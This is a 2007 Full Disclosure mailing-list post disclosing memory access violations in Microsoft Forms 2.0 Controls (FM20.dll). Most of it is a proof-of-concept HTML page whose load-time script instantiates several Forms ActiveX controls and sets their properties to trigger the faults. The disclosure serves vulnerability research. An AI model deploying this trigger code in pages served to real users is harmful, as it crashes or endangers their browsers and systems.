Full Disclosure mailing list archives
Microsoft Forms 2.0 Controls Multiple Memory Access Violations
From: Elazar Broad <elazarb () earthlink net>
Date: Mon, 12 Nov 2007 16:07:22 -0500 (GMT-05:00)
There are multiple memory access violations in the Microsoft Forms 2.0 Controls(FM20.dll). PoC as follows:
------------------------
<!--
written by e.b.
-->
<!--
Written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var obj;
//Forms.Checkbox.1
obj = new ActiveXObject("Forms.Checkbox.1");
obj.Caption = "A";
obj.GroupName = "A";
obj.Accelerator = "A";
//Forms.OptionButton.1
obj = new ActiveXObject("Forms.OptionButton.1");
obj.Caption = "A";
obj.GroupName = "A";
obj.Accelerator = "A";
//Forms.ToggleButton.1
obj = new ActiveXObject("Forms.ToggleButton.1");
obj.Caption = "A";
obj.GroupName = "A";
obj.Accelerator = "A";
//Forms.ComboBox.1
obj = new ActiveXObject("Forms.ComboBox.1");
obj.Text = "A";
obj.Value = "A";
//Forms.TextBox.1
obj = new ActiveXObject("Forms.Textbox.1");
obj.Text = "A";
obj.Value = "A";
obj.SelStart = 1;
}
</script>
</head>
<body onLoad="JavaScript: return Check();" />
</html>
------------------------
There may be more.
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Microsoft Forms 2.0 Controls Multiple Memory Access Violations Elazar Broad (Nov 12)